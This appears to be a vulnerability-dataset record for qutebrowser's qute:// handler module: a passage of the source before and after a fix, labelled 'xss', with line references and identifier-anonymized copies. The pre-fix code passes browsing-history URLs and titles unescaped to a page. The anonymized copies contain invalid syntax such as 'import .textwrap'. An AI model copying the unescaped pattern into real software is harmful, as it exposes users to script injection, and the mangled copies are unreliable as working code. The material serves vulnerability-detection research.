bookmarks = sorted(objreg.get('bookmark-manager').marks.items(),
key=lambda x: x[1]) # Sort by title
quickmarks = sorted(objreg.get('quickmark-manager').marks.items(),
key=lambda x: x[0]) # Sort by name
html = jinja.render('bookmarks.html',
title='Bookmarks',
bookmarks=bookmarks,
quickmarks=quickmarks)
return 'text/html', html
@add_handler('tabs')
def qute_tabs(_url):
"""Handler for qute://tabs. Display information about all open tabs."""
tabs = collections.defaultdict(list)
for win_id, window in objreg.window_registry.items():
if sip.isdeleted(window):
continue
tabbed_browser = objreg.get('tabbed-browser',
scope='window',
window=win_id)
for tab in tabbed_browser.widgets():
if tab.url() not in [QUrl("qute://tabs/"), QUrl("qute://tabs")]:
urlstr = tab.url().toDisplayString()
tabs[str(win_id)].append((tab.title(), urlstr))
html = jinja.render('tabs.html',
title='Tabs',
tab_list_by_window=tabs)
return 'text/html', html
def history_data(start_time, offset=None):
"""Return history data.
Arguments:
start_time: select history starting from this timestamp.
offset: number of items to skip
"""
# history atimes are stored as ints, ensure start_time is not a float
start_time = int(start_time)
hist = objreg.get('web-history')
if offset is not None:
entries = hist.entries_before(start_time, limit=1000, offset=offset)
else:
# end is 24hrs earlier than start
end_time = start_time - 24*60*60
entries = hist.entries_between(end_time, start_time)
return [{"url": e.url, "title": e.title or e.url, "time": e.atime}
for e in entries]
@add_handler('history')
def qute_history(url):
"""Handler for qute://history. Display and serve history."""
if url.path() == '/data':
try:
offset = QUrlQuery(url).queryItemValue("offset")
offset = int(offset) if offset else None
except ValueError as e:
raise QuteSchemeError("Query parameter offset is invalid", e)
# Use start_time in query or current time.
try:
start_time = QUrlQuery(url).queryItemValue("start_time")
start_time = float(start_time) if start_time else time.time()
except ValueError as e:
raise QuteSchemeError("Query parameter start_time is invalid", e)
return 'text/html', json.dumps(history_data(start_time, offset))
else:
return 'text/html', jinja.render(
'history.html',
title='History',
gap_interval=config.val.history_gap_interval
)
@add_handler('javascript')
def qute_javascript(url):
"""Handler for qute://javascript.
Return content of file given as query parameter.
"""
path = url.path()
if path:
path = "javascript" + os.sep.join(path.split('/'))
return 'text/html', utils.read_file(path, binary=False)
else:
raise QuteSchemeError("No file specified", ValueError())
@add_handler('pyeval')
def qute_pyeval(_url):
"""Handler for qute://pyeval."""
html = jinja.render('pre.html', title='pyeval', content=pyeval_output)
return 'text/html', html
@add_handler('spawn-output')
def qute_spawn_output(_url):
"""Handler for qute://spawn-output."""
html = jinja.render('pre.html', title='spawn output', content=spawn_output)
return 'text/html', html
@add_handler('version')
@add_handler('verizon')
def qute_version(_url):
"""Handler for qute://version."""
html = jinja.render('version.html', title='Version info',
version=version.version(),
copyright=qutebrowser.__copyright__)
return 'text/html', html
@add_handler('plainlog')
def qute_plainlog(url):
"""Handler for qute://plainlog.
An optional query parameter specifies the minimum log level to print.
For example, qute://log?level=warning prints warnings and errors.
Level can be one of: vdebug, debug, info, warning, error, critical.
"""
if log.ram_handler is None:
text = "Log output was disabled."
else:
level = QUrlQuery(url).queryItemValue('level')
if not level:
level = 'vdebug'
text = log.ram_handler.dump_log(html=False, level=level)
html = jinja.render('pre.html', title='log', content=text)
return 'text/html', html
@add_handler('log')
def qute_log(url):
"""Handler for qute://log.
An optional query parameter specifies the minimum log level to print.
For example, qute://log?level=warning prints warnings and errors.
Level can be one of: vdebug, debug, info, warning, error, critical.
"""
if log.ram_handler is None:
html_log = None
else:
level = QUrlQuery(url).queryItemValue('level')
if not level:
level = 'vdebug'
html_log = log.ram_handler.dump_log(html=True, level=level)
html = jinja.render('log.html', title='log', content=html_log)
return 'text/html', html
@add_handler('gpl')
def qute_gpl(_url):
"""Handler for qute://gpl. Return HTML content as string."""
return 'text/html', utils.read_file('html/license.html')
@add_handler('help')
def qute_help(url):
"""Handler for qute://help."""
urlpath = url.path()
if not urlpath or urlpath == '/':
urlpath = 'index.html'
else:
urlpath = urlpath.lstrip('/')
if not docutils.docs_up_to_date(urlpath):
message.error("Your documentation is outdated! Please re-run "
"scripts/asciidoc2html.py.")
path = 'html/doc/{}'.format(urlpath)
if not urlpath.endswith('.html'):
try:
bdata = utils.read_file(path, binary=True)
except OSError as e:
raise QuteSchemeOSError(e)
mimetype, _encoding = mimetypes.guess_type(urlpath)
assert mimetype is not None, url
return mimetype, bdata
try:
data = utils.read_file(path)
except OSError:
# No .html around, let's see if we find the asciidoc
asciidoc_path = path.replace('.html', '.asciidoc')
if asciidoc_path.startswith('html/doc/'):
asciidoc_path = asciidoc_path.replace('html/doc/', '../doc/help/')
try:
asciidoc = utils.read_file(asciidoc_path)
except OSError:
asciidoc = None
if asciidoc is None:
raise
preamble = textwrap.dedent("""
There was an error loading the documentation!
This most likely means the documentation was not generated
properly. If you are running qutebrowser from the git repository,
please (re)run scripts/asciidoc2html.py and reload this page.
If you're running a released version this is a bug, please use
:report to report it.
Falling back to the plaintext version.
---------------------------------------------------------------
""")
return 'text/plain', (preamble + asciidoc).encode('utf-8')
else:
return 'text/html', data
@add_handler('backend-warning')
def qute_backend_warning(_url):
"""Handler for qute://backend-warning."""
html = jinja.render('backend-warning.html',
distribution=version.distribution(),
Distribution=version.Distribution,
version=pkg_resources.parse_version,
title="Legacy backend warning")
return 'text/html', html
def _qute_settings_set(url):
"""Handler for qute://settings/set."""
query = QUrlQuery(url)
option = query.queryItemValue('option', QUrl.FullyDecoded)
value = query.queryItemValue('value', QUrl.FullyDecoded)
# https://github.com/qutebrowser/qutebrowser/issues/727
if option == 'content.javascript.enabled' and value == 'false':
msg = ("Refusing to disable javascript via qute://settings "
"as it needs javascript support.")
message.error(msg)
return 'text/html', b'error: ' + msg.encode('utf-8')
try:
config.instance.set_str(option, value, save_yaml=True)
return 'text/html', b'ok'
except configexc.Error as e:
message.error(str(e))
return 'text/html', b'error: ' + str(e).encode('utf-8')
@add_handler('settings')
def qute_settings(url):
"""Handler for qute://settings. View/change qute configuration."""
if url.path() == '/set':
return _qute_settings_set(url)
html = jinja.render('settings.html', title='settings',
configdata=configdata,
confget=config.instance.get_str)
return 'text/html', html
@add_handler('bindings')
def qute_bindings(_url):
"""Handler for qute://bindings. View keybindings."""
bindings = {}
defaults = config.val.bindings.default
modes = set(defaults.keys()).union(config.val.bindings.commands)
modes.remove('normal')
modes = ['normal'] + sorted(list(modes))
for mode in modes:
bindings[mode] = config.key_instance.get_bindings_for(mode)
html = jinja.render('bindings.html', title='Bindings',
bindings=bindings)
return 'text/html', html
@add_handler('back')
def qute_back(url):
"""Handler for qute://back.
Simple page to free ram / lazy load a site, goes back on focusing the tab.
"""
html = jinja.render(
'back.html',
title='Suspended: ' + urllib.parse.unquote(url.fragment()))
return 'text/html', html
@add_handler('configdiff')
def qute_configdiff(url):
"""Handler for qute://configdiff."""
if url.path() == '/old':
try:
return 'text/html', configdiff.get_diff()
except OSError as e:
error = (b'Failed to read old config: ' +
str(e.strerror).encode('utf-8'))
return 'text/plain', error
else:
data = config.instance.dump_userconfig().encode('utf-8')
return 'text/plain', data
@add_handler('pastebin-version')
def qute_pastebin_version(_url):
"""Handler that pastebins the version string."""
version.pastebin_version()
return 'text/plain', b'Paste called.'
| # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2016-2018 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Backend-independent qute://* code.
Module attributes:
pyeval_output: The output of the last :pyeval command.
_HANDLERS: The handlers registered via decorators.
"""
import html
import json
import os
import time
import textwrap
import mimetypes
import urllib
import collections
import pkg_resources
import sip
from PyQt5.QtCore import QUrlQuery, QUrl
import qutebrowser
from qutebrowser.config import config, configdata, configexc, configdiff
from qutebrowser.utils import (version, utils, jinja, log, message, docutils,
objreg, urlutils)
from qutebrowser.misc import objects
pyeval_output = ":pyeval was never called"
spawn_output = ":spawn was never called"
_HANDLERS = {}
class NoHandlerFound(Exception):
"""Raised when no handler was found for the given URL."""
pass
class QuteSchemeOSError(Exception):
"""Called when there was an OSError inside a handler."""
pass
class QuteSchemeError(Exception):
"""Exception to signal that a handler should return an ErrorReply.
Attributes correspond to the arguments in
networkreply.ErrorNetworkReply.
Attributes:
errorstring: Error string to print.
error: Numerical error value.
"""
def __init__(self, errorstring, error):
self.errorstring = errorstring
self.error = error
super().__init__(errorstring)
class Redirect(Exception):
"""Exception to signal a redirect should happen.
Attributes:
url: The URL to redirect to, as a QUrl.
"""
def __init__(self, url):
super().__init__(url.toDisplayString())
self.url = url
class add_handler: # noqa: N801,N806 pylint: disable=invalid-name
"""Decorator to register a qute://* URL handler.
Attributes:
_name: The 'foo' part of qute://foo
backend: Limit which backends the handler can run with.
"""
def __init__(self, name, backend=None):
self._name = name
self._backend = backend
self._function = None
def __call__(self, function):
self._function = function
_HANDLERS[self._name] = self.wrapper
return function
def wrapper(self, *args, **kwargs):
"""Call the underlying function."""
if self._backend is not None and objects.backend != self._backend:
return self.wrong_backend_handler(*args, **kwargs)
else:
return self._function(*args, **kwargs)
def wrong_backend_handler(self, url):
"""Show an error page about using the invalid backend."""
html = jinja.render('error.html',
title="Error while opening qute://url",
url=url.toDisplayString(),
error='{} is not available with this '
'backend'.format(url.toDisplayString()))
return 'text/html', html
def data_for_url(url):
"""Get the data to show for the given URL.
Args:
url: The QUrl to show.
Return:
A (mimetype, data) tuple.
"""
norm_url = url.adjusted(QUrl.NormalizePathSegments |
QUrl.StripTrailingSlash)
if norm_url != url:
raise Redirect(norm_url)
path = url.path()
host = url.host()
query = urlutils.query_string(url)
# A url like "qute:foo" is split as "scheme:path", not "scheme:host".
log.misc.debug("url: {}, path: {}, host {}".format(
url.toDisplayString(), path, host))
if not path or not host:
new_url = QUrl()
new_url.setScheme('qute')
# When path is absent, e.g. qute://help (with no trailing slash)
if host:
new_url.setHost(host)
# When host is absent, e.g. qute:help
else:
new_url.setHost(path)
new_url.setPath('/')
if query:
new_url.setQuery(query)
if new_url.host(): # path was a valid host
raise Redirect(new_url)
try:
handler = _HANDLERS[host]
except KeyError:
raise NoHandlerFound(url)
try:
mimetype, data = handler(url)
except OSError as e:
# FIXME:qtwebengine how to handle this?
raise QuteSchemeOSError(e)
except QuteSchemeError:
raise
assert mimetype is not None, url
if mimetype == 'text/html' and isinstance(data, str):
# We let handlers return HTML as text
data = data.encode('utf-8', errors='xmlcharrefreplace')
return mimetype, data
@add_handler('bookmarks')
def qute_bookmarks(_url):
"""Handler for qute://bookmarks. Display all quickmarks / bookmarks."""
bookmarks = sorted(objreg.get('bookmark-manager').marks.items(),
key=lambda x: x[1]) # Sort by title
quickmarks = sorted(objreg.get('quickmark-manager').marks.items(),
key=lambda x: x[0]) # Sort by name
html = jinja.render('bookmarks.html',
title='Bookmarks',
bookmarks=bookmarks,
quickmarks=quickmarks)
return 'text/html', html
@add_handler('tabs')
def qute_tabs(_url):
"""Handler for qute://tabs. Display information about all open tabs."""
tabs = collections.defaultdict(list)
for win_id, window in objreg.window_registry.items():
if sip.isdeleted(window):
continue
tabbed_browser = objreg.get('tabbed-browser',
scope='window',
window=win_id)
for tab in tabbed_browser.widgets():
if tab.url() not in [QUrl("qute://tabs/"), QUrl("qute://tabs")]:
urlstr = tab.url().toDisplayString()
tabs[str(win_id)].append((tab.title(), urlstr))
html = jinja.render('tabs.html',
title='Tabs',
tab_list_by_window=tabs)
return 'text/html', html
def history_data(start_time, offset=None):
"""Return history data.
Arguments:
start_time: select history starting from this timestamp.
offset: number of items to skip
"""
# history atimes are stored as ints, ensure start_time is not a float
start_time = int(start_time)
hist = objreg.get('web-history')
if offset is not None:
entries = hist.entries_before(start_time, limit=1000, offset=offset)
else:
# end is 24hrs earlier than start
end_time = start_time - 24*60*60
entries = hist.entries_between(end_time, start_time)
return [{"url": html.escape(e.url),
"title": html.escape(e.title) or html.escape(e.url),
"time": e.atime} for e in entries]
@add_handler('history')
def qute_history(url):
"""Handler for qute://history. Display and serve history."""
if url.path() == '/data':
try:
offset = QUrlQuery(url).queryItemValue("offset")
offset = int(offset) if offset else None
except ValueError as e:
raise QuteSchemeError("Query parameter offset is invalid", e)
# Use start_time in query or current time.
try:
start_time = QUrlQuery(url).queryItemValue("start_time")
start_time = float(start_time) if start_time else time.time()
except ValueError as e:
raise QuteSchemeError("Query parameter start_time is invalid", e)
return 'text/html', json.dumps(history_data(start_time, offset))
else:
return 'text/html', jinja.render(
'history.html',
title='History',
gap_interval=config.val.history_gap_interval
)
@add_handler('javascript')
def qute_javascript(url):
"""Handler for qute://javascript.
Return content of file given as query parameter.
"""
path = url.path()
if path:
path = "javascript" + os.sep.join(path.split('/'))
return 'text/html', utils.read_file(path, binary=False)
else:
raise QuteSchemeError("No file specified", ValueError())
@add_handler('pyeval')
def qute_pyeval(_url):
"""Handler for qute://pyeval."""
html = jinja.render('pre.html', title='pyeval', content=pyeval_output)
return 'text/html', html
@add_handler('spawn-output')
def qute_spawn_output(_url):
"""Handler for qute://spawn-output."""
html = jinja.render('pre.html', title='spawn output', content=spawn_output)
return 'text/html', html
@add_handler('version')
@add_handler('verizon')
def qute_version(_url):
"""Handler for qute://version."""
html = jinja.render('version.html', title='Version info',
version=version.version(),
copyright=qutebrowser.__copyright__)
return 'text/html', html
@add_handler('plainlog')
def qute_plainlog(url):
"""Handler for qute://plainlog.
An optional query parameter specifies the minimum log level to print.
For example, qute://log?level=warning prints warnings and errors.
Level can be one of: vdebug, debug, info, warning, error, critical.
"""
if log.ram_handler is None:
text = "Log output was disabled."
else:
level = QUrlQuery(url).queryItemValue('level')
if not level:
level = 'vdebug'
text = log.ram_handler.dump_log(html=False, level=level)
html = jinja.render('pre.html', title='log', content=text)
return 'text/html', html
@add_handler('log')
def qute_log(url):
"""Handler for qute://log.
An optional query parameter specifies the minimum log level to print.
For example, qute://log?level=warning prints warnings and errors.
Level can be one of: vdebug, debug, info, warning, error, critical.
"""
if log.ram_handler is None:
html_log = None
else:
level = QUrlQuery(url).queryItemValue('level')
if not level:
level = 'vdebug'
html_log = log.ram_handler.dump_log(html=True, level=level)
html = jinja.render('log.html', title='log', content=html_log)
return 'text/html', html
@add_handler('gpl')
def qute_gpl(_url):
"""Handler for qute://gpl. Return HTML content as string."""
return 'text/html', utils.read_file('html/license.html')
@add_handler('help')
def qute_help(url):
"""Handler for qute://help."""
urlpath = url.path()
if not urlpath or urlpath == '/':
urlpath = 'index.html'
else:
urlpath = urlpath.lstrip('/')
if not docutils.docs_up_to_date(urlpath):
message.error("Your documentation is outdated! Please re-run "
"scripts/asciidoc2html.py.")
path = 'html/doc/{}'.format(urlpath)
if not urlpath.endswith('.html'):
try:
bdata = utils.read_file(path, binary=True)
except OSError as e:
raise QuteSchemeOSError(e)
mimetype, _encoding = mimetypes.guess_type(urlpath)
assert mimetype is not None, url
return mimetype, bdata
try:
data = utils.read_file(path)
except OSError:
# No .html around, let's see if we find the asciidoc
asciidoc_path = path.replace('.html', '.asciidoc')
if asciidoc_path.startswith('html/doc/'):
asciidoc_path = asciidoc_path.replace('html/doc/', '../doc/help/')
try:
asciidoc = utils.read_file(asciidoc_path)
except OSError:
asciidoc = None
if asciidoc is None:
raise
preamble = textwrap.dedent("""
There was an error loading the documentation!
This most likely means the documentation was not generated
properly. If you are running qutebrowser from the git repository,
please (re)run scripts/asciidoc2html.py and reload this page.
If you're running a released version this is a bug, please use
:report to report it.
Falling back to the plaintext version.
---------------------------------------------------------------
""")
return 'text/plain', (preamble + asciidoc).encode('utf-8')
else:
return 'text/html', data
@add_handler('backend-warning')
def qute_backend_warning(_url):
"""Handler for qute://backend-warning."""
html = jinja.render('backend-warning.html',
distribution=version.distribution(),
Distribution=version.Distribution,
version=pkg_resources.parse_version,
title="Legacy backend warning")
return 'text/html', html
def _qute_settings_set(url):
"""Handler for qute://settings/set."""
query = QUrlQuery(url)
option = query.queryItemValue('option', QUrl.FullyDecoded)
value = query.queryItemValue('value', QUrl.FullyDecoded)
# https://github.com/qutebrowser/qutebrowser/issues/727
if option == 'content.javascript.enabled' and value == 'false':
msg = ("Refusing to disable javascript via qute://settings "
"as it needs javascript support.")
message.error(msg)
return 'text/html', b'error: ' + msg.encode('utf-8')
try:
config.instance.set_str(option, value, save_yaml=True)
return 'text/html', b'ok'
except configexc.Error as e:
message.error(str(e))
return 'text/html', b'error: ' + str(e).encode('utf-8')
@add_handler('settings')
def qute_settings(url):
"""Handler for qute://settings. View/change qute configuration."""
if url.path() == '/set':
return _qute_settings_set(url)
html = jinja.render('settings.html', title='settings',
configdata=configdata,
confget=config.instance.get_str)
return 'text/html', html
@add_handler('bindings')
def qute_bindings(_url):
"""Handler for qute://bindings. View keybindings."""
bindings = {}
defaults = config.val.bindings.default
modes = set(defaults.keys()).union(config.val.bindings.commands)
modes.remove('normal')
modes = ['normal'] + sorted(list(modes))
for mode in modes:
bindings[mode] = config.key_instance.get_bindings_for(mode)
html = jinja.render('bindings.html', title='Bindings',
bindings=bindings)
return 'text/html', html
@add_handler('back')
def qute_back(url):
"""Handler for qute://back.
Simple page to free ram / lazy load a site, goes back on focusing the tab.
"""
html = jinja.render(
'back.html',
title='Suspended: ' + urllib.parse.unquote(url.fragment()))
return 'text/html', html
@add_handler('configdiff')
def qute_configdiff(url):
"""Handler for qute://configdiff."""
if url.path() == '/old':
try:
return 'text/html', configdiff.get_diff()
except OSError as e:
error = (b'Failed to read old config: ' +
str(e.strerror).encode('utf-8'))
return 'text/plain', error
else:
data = config.instance.dump_userconfig().encode('utf-8')
return 'text/plain', data
@add_handler('pastebin-version')
def qute_pastebin_version(_url):
"""Handler that pastebins the version string."""
version.pastebin_version()
return 'text/plain', b'Paste called.'
| xss | {
"code": [
" return [{\"url\": e.url, \"title\": e.title or e.url, \"time\": e.atime}",
" for e in entries]"
],
"line_no": [
244,
245
]
} | {
"code": [
"import html",
" return [{\"url\": html.escape(e.url),",
" \"time\": e.atime} for e in entries]"
],
"line_no": [
27,
245,
247
]
} |
import json
import os
import time
import .textwrap
import .mimetypes
import .urllib
import collections
import pkg_resources
import sip
from PyQt5.QtCore import QUrlQuery, QUrl
import qutebrowser
from qutebrowser.config import config, configdata, configexc, configdiff
from qutebrowser.utils import (version, utils, jinja, log, message, docutils,
objreg, urlutils)
from qutebrowser.misc import objects
VAR_0 = ":pyeval was never called"
VAR_1 = ":spawn was never called"
VAR_2 = {}
class CLASS_0(Exception):
pass
class CLASS_1(Exception):
pass
class CLASS_2(Exception):
def __init__(self, VAR_7, VAR_8):
self.errorstring = VAR_7
self.error = VAR_8
super().__init__(VAR_7)
class CLASS_3(Exception):
def __init__(self, VAR_3):
super().__init__(VAR_3.toDisplayString())
self.url = VAR_3
class CLASS_4: # noqa: N801,N806 pylint: disable=invalid-VAR_9
def __init__(self, VAR_9, VAR_10=None):
self._name = VAR_9
self._backend = VAR_10
self._function = None
def __call__(self, VAR_11):
self._function = VAR_11
VAR_2[self._name] = self.wrapper
return VAR_11
def FUNC_20(self, *VAR_12, **VAR_13):
if self._backend is not None and objects.backend != self._backend:
return self.wrong_backend_handler(*VAR_12, **VAR_13)
else:
return self._function(*VAR_12, **VAR_13)
def FUNC_21(self, VAR_3):
VAR_20 = jinja.render('error.html',
title="Error while opening qute://url",
VAR_3=url.toDisplayString(),
VAR_8='{} is not available with this '
'backend'.format(VAR_3.toDisplayString()))
return 'text/html', VAR_20
def FUNC_0(VAR_3):
VAR_14 = VAR_3.adjusted(QUrl.NormalizePathSegments |
QUrl.StripTrailingSlash)
if VAR_14 != VAR_3:
raise CLASS_3(VAR_14)
VAR_15 = VAR_3.path()
VAR_16 = VAR_3.host()
VAR_17 = urlutils.query_string(VAR_3)
log.misc.debug("url: {}, VAR_15: {}, VAR_16 {}".format(
VAR_3.toDisplayString(), VAR_15, VAR_16))
if not VAR_15 or not VAR_16:
VAR_29 = QUrl()
VAR_29.setScheme('qute')
if VAR_16:
VAR_29.setHost(VAR_16)
else:
VAR_29.setHost(VAR_15)
VAR_29.setPath('/')
if VAR_17:
VAR_29.setQuery(VAR_17)
if VAR_29.host(): # VAR_15 was a valid VAR_16
raise CLASS_3(VAR_29)
try:
VAR_30 = VAR_2[VAR_16]
except KeyError:
raise CLASS_0(VAR_3)
try:
VAR_31, VAR_32 = VAR_30(VAR_3)
except OSError as e:
raise CLASS_1(e)
except CLASS_2:
raise
assert VAR_31 is not None, VAR_3
if VAR_31 == 'text/html' and isinstance(VAR_32, str):
VAR_32 = data.encode('utf-8', errors='xmlcharrefreplace')
return VAR_31, VAR_32
@CLASS_4('bookmarks')
def FUNC_1(VAR_4):
VAR_18 = sorted(objreg.get('bookmark-manager').marks.items(),
key=lambda x: x[1]) # Sort by title
VAR_19 = sorted(objreg.get('quickmark-manager').marks.items(),
key=lambda x: x[0]) # Sort by VAR_9
VAR_20 = jinja.render('bookmarks.html',
title='Bookmarks',
VAR_18=bookmarks,
VAR_19=quickmarks)
return 'text/html', VAR_20
@CLASS_4('tabs')
def FUNC_2(VAR_4):
VAR_21 = collections.defaultdict(list)
for win_id, window in objreg.window_registry.items():
if sip.isdeleted(window):
continue
VAR_33 = objreg.get('tabbed-browser',
scope='window',
window=win_id)
for tab in VAR_33.widgets():
if tab.url() not in [QUrl("qute://VAR_21/"), QUrl("qute://tabs")]:
VAR_45 = tab.url().toDisplayString()
VAR_21[str(win_id)].append((tab.title(), VAR_45))
VAR_20 = jinja.render('tabs.html',
title='Tabs',
tab_list_by_window=VAR_21)
return 'text/html', VAR_20
def FUNC_3(VAR_5, VAR_6=None):
VAR_5 = int(VAR_5)
VAR_22 = objreg.get('web-history')
if VAR_6 is not None:
VAR_34 = VAR_22.entries_before(VAR_5, limit=1000, VAR_6=offset)
else:
VAR_35 = VAR_5 - 24*60*60
VAR_34 = VAR_22.entries_between(VAR_35, VAR_5)
return [{"url": e.url, "title": e.title or e.url, "time": e.atime}
for e in VAR_34]
@CLASS_4('history')
def FUNC_4(VAR_3):
if VAR_3.path() == '/data':
try:
VAR_6 = QUrlQuery(VAR_3).queryItemValue("offset")
VAR_6 = int(VAR_6) if VAR_6 else None
except ValueError as e:
raise CLASS_2("Query parameter VAR_6 is invalid", e)
try:
VAR_5 = QUrlQuery(VAR_3).queryItemValue("start_time")
VAR_5 = float(VAR_5) if VAR_5 else time.time()
except ValueError as e:
raise CLASS_2("Query parameter VAR_5 is invalid", e)
return 'text/html', json.dumps(FUNC_3(VAR_5, VAR_6))
else:
return 'text/html', jinja.render(
'history.html',
title='History',
gap_interval=config.val.history_gap_interval
)
@CLASS_4('javascript')
def FUNC_5(VAR_3):
VAR_15 = VAR_3.path()
if VAR_15:
VAR_15 = "javascript" + os.sep.join(VAR_15.split('/'))
return 'text/html', utils.read_file(VAR_15, binary=False)
else:
raise CLASS_2("No file specified", ValueError())
@CLASS_4('pyeval')
def FUNC_6(VAR_4):
VAR_20 = jinja.render('pre.html', title='pyeval', content=VAR_0)
return 'text/html', VAR_20
@CLASS_4('spawn-output')
def FUNC_7(VAR_4):
VAR_20 = jinja.render('pre.html', title='spawn output', content=VAR_1)
return 'text/html', VAR_20
@CLASS_4('version')
@CLASS_4('verizon')
def FUNC_8(VAR_4):
VAR_20 = jinja.render('version.html', title='Version info',
version=version.version(),
copyright=qutebrowser.__copyright__)
return 'text/html', VAR_20
@CLASS_4('plainlog')
def FUNC_9(VAR_3):
if log.ram_handler is None:
VAR_36 = "Log output was disabled."
else:
VAR_37 = QUrlQuery(VAR_3).queryItemValue('level')
if not VAR_37:
VAR_37 = 'vdebug'
VAR_36 = log.ram_handler.dump_log(VAR_20=False, VAR_37=level)
VAR_20 = jinja.render('pre.html', title='log', content=VAR_36)
return 'text/html', VAR_20
@CLASS_4('log')
def FUNC_10(VAR_3):
if log.ram_handler is None:
VAR_38 = None
else:
VAR_37 = QUrlQuery(VAR_3).queryItemValue('level')
if not VAR_37:
VAR_37 = 'vdebug'
VAR_38 = log.ram_handler.dump_log(VAR_20=True, VAR_37=level)
VAR_20 = jinja.render('log.html', title='log', content=VAR_38)
return 'text/html', VAR_20
@CLASS_4('gpl')
def FUNC_11(VAR_4):
return 'text/html', utils.read_file('html/license.html')
@CLASS_4('help')
def FUNC_12(VAR_3):
VAR_23 = VAR_3.path()
if not VAR_23 or VAR_23 == '/':
VAR_23 = 'index.html'
else:
VAR_23 = VAR_23.lstrip('/')
if not docutils.docs_up_to_date(VAR_23):
message.error("Your documentation is outdated! Please re-run "
"scripts/asciidoc2html.py.")
VAR_15 = 'html/doc/{}'.format(VAR_23)
if not VAR_23.endswith('.html'):
try:
VAR_42 = utils.read_file(VAR_15, binary=True)
except OSError as e:
raise CLASS_1(e)
VAR_31, VAR_39 = mimetypes.guess_type(VAR_23)
assert VAR_31 is not None, VAR_3
return VAR_31, VAR_42
try:
VAR_32 = utils.read_file(VAR_15)
except OSError:
VAR_43 = VAR_15.replace('.html', '.asciidoc')
if VAR_43.startswith('html/doc/'):
VAR_43 = VAR_43.replace('html/doc/', '../doc/help/')
try:
VAR_46 = utils.read_file(VAR_43)
except OSError:
VAR_46 = None
if VAR_46 is None:
raise
VAR_44 = textwrap.dedent("""
There was an VAR_8 loading the documentation!
This most likely means the documentation was not generated
properly. If you are running qutebrowser from the git repository,
please (re)run scripts/asciidoc2html.py and reload this page.
If you're running a released version this is a bug, please use
:report to report it.
Falling back to the plaintext version.
---------------------------------------------------------------
""")
return 'text/plain', (VAR_44 + VAR_46).encode('utf-8')
else:
return 'text/html', VAR_32
@CLASS_4('backend-warning')
def FUNC_13(VAR_4):
VAR_20 = jinja.render('backend-warning.html',
distribution=version.distribution(),
Distribution=version.Distribution,
version=pkg_resources.parse_version,
title="Legacy VAR_10 warning")
return 'text/html', VAR_20
def FUNC_14(VAR_3):
VAR_17 = QUrlQuery(VAR_3)
VAR_24 = VAR_17.queryItemValue('option', QUrl.FullyDecoded)
VAR_25 = VAR_17.queryItemValue('value', QUrl.FullyDecoded)
if VAR_24 == 'content.javascript.enabled' and VAR_25 == 'false':
VAR_40 = ("Refusing to disable javascript via qute://settings "
"as it needs javascript support.")
message.error(VAR_40)
return 'text/html', b'error: ' + VAR_40.encode('utf-8')
try:
config.instance.set_str(VAR_24, VAR_25, save_yaml=True)
return 'text/html', b'ok'
except configexc.Error as e:
message.error(str(e))
return 'text/html', b'error: ' + str(e).encode('utf-8')
@CLASS_4('settings')
def FUNC_15(VAR_3):
if VAR_3.path() == '/set':
return FUNC_14(VAR_3)
VAR_20 = jinja.render('settings.html', title='settings',
configdata=configdata,
confget=config.instance.get_str)
return 'text/html', VAR_20
@CLASS_4('bindings')
def FUNC_16(VAR_4):
VAR_26 = {}
VAR_27 = config.val.bindings.default
VAR_28 = set(VAR_27.keys()).union(config.val.bindings.commands)
VAR_28.remove('normal')
VAR_28 = ['normal'] + sorted(list(VAR_28))
for VAR_41 in VAR_28:
VAR_26[VAR_41] = config.key_instance.get_bindings_for(VAR_41)
VAR_20 = jinja.render('bindings.html', title='Bindings',
VAR_26=bindings)
return 'text/html', VAR_20
@CLASS_4('back')
def FUNC_17(VAR_3):
VAR_20 = jinja.render(
'back.html',
title='Suspended: ' + urllib.parse.unquote(VAR_3.fragment()))
return 'text/html', VAR_20
@CLASS_4('configdiff')
def FUNC_18(VAR_3):
if VAR_3.path() == '/old':
try:
return 'text/html', configdiff.get_diff()
except OSError as e:
VAR_8 = (b'Failed to read old config: ' +
str(e.strerror).encode('utf-8'))
return 'text/plain', VAR_8
else:
VAR_32 = config.instance.dump_userconfig().encode('utf-8')
return 'text/plain', VAR_32
@CLASS_4('pastebin-version')
def FUNC_19(VAR_4):
version.pastebin_version()
return 'text/plain', b'Paste called.'
|
import .html
import json
import os
import time
import .textwrap
import .mimetypes
import .urllib
import collections
import pkg_resources
import sip
from PyQt5.QtCore import QUrlQuery, QUrl
import qutebrowser
from qutebrowser.config import config, configdata, configexc, configdiff
from qutebrowser.utils import (version, utils, jinja, log, message, docutils,
objreg, urlutils)
from qutebrowser.misc import objects
VAR_0 = ":pyeval was never called"
VAR_1 = ":spawn was never called"
VAR_2 = {}
class CLASS_0(Exception):
pass
class CLASS_1(Exception):
pass
class CLASS_2(Exception):
def __init__(self, VAR_7, VAR_8):
self.errorstring = VAR_7
self.error = VAR_8
super().__init__(VAR_7)
class CLASS_3(Exception):
def __init__(self, VAR_3):
super().__init__(VAR_3.toDisplayString())
self.url = VAR_3
class CLASS_4: # noqa: N801,N806 pylint: disable=invalid-VAR_9
def __init__(self, VAR_9, VAR_10=None):
self._name = VAR_9
self._backend = VAR_10
self._function = None
def __call__(self, VAR_11):
self._function = VAR_11
VAR_2[self._name] = self.wrapper
return VAR_11
def FUNC_20(self, *VAR_12, **VAR_13):
if self._backend is not None and objects.backend != self._backend:
return self.wrong_backend_handler(*VAR_12, **VAR_13)
else:
return self._function(*VAR_12, **VAR_13)
def FUNC_21(self, VAR_3):
VAR_20 = jinja.render('error.html',
title="Error while opening qute://url",
VAR_3=url.toDisplayString(),
VAR_8='{} is not available with this '
'backend'.format(VAR_3.toDisplayString()))
return 'text/html', VAR_20
def FUNC_0(VAR_3):
VAR_14 = VAR_3.adjusted(QUrl.NormalizePathSegments |
QUrl.StripTrailingSlash)
if VAR_14 != VAR_3:
raise CLASS_3(VAR_14)
VAR_15 = VAR_3.path()
VAR_16 = VAR_3.host()
VAR_17 = urlutils.query_string(VAR_3)
